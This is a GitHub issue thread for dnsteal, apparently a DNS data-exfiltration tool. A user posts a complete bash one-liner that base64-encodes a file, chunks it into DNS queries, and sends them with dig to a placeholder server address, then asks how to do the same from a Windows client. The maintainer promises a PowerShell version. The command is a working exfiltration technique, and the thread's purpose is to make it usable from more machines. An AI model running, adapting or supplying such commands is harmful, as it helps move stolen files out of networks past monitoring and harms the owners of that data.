### ISSUE TITLE
Can the exfiltration be done on a Windows client with the same command?

### ISSUE THREAD

**Issue by ghost** [m57/dnsteal#9]
Hi,

I have the server running, as shown in the screen shot below and am able to send data from an Ubuntu client. Do you know what I need to modify in the command below to send data from a Windows client in PowerShell or cmd.exe?

![2](https://cloud.githubusercontent.com/assets/22260050/22516293/fa8a9c70-e86a-11e6-8b6f-60838e60b0aa.PNG)

f=test_file.txt; s=4;b=57;c=0; for r in $(for i in $(base64 -w0 $f| sed "s/.\{$b\}/&\n/g");do if [[ "$c" -lt "$s"  ]]; then echo -ne "$i-."; c=$(($c+1)); else echo -ne "\n$i-."; c=1; fi; done ); do dig @x.x.x.x `echo -ne $r$f|tr "+" "*"` +short; done

Thanks for your help

**Comment by m57** [comment]
Hi there, i will be releasing a new version soon which will also print out the powershell variant of the exfiltration commands. Keep a close eye i am currently busy but it is definetly planned to be released.

**Comment by ghost** [comment]
Thanks, looking forward to it
